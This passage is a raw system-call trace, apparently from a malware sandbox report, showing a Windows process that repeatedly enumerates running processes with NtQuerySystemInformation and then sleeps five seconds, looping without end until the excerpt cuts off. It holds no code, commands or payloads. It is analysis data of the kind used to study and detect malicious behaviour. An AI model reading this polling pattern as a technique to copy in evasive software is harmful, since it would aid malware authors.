[0138.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.454] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.474] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.482] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.485] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.500] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.533] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.548] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.563] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.580] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.594] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.610] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.626] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.643] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.657] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.673] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.674] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.704] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.720] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.735] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.757] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0138.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0138.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0138.769] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0138.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0138.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0138.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0138.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 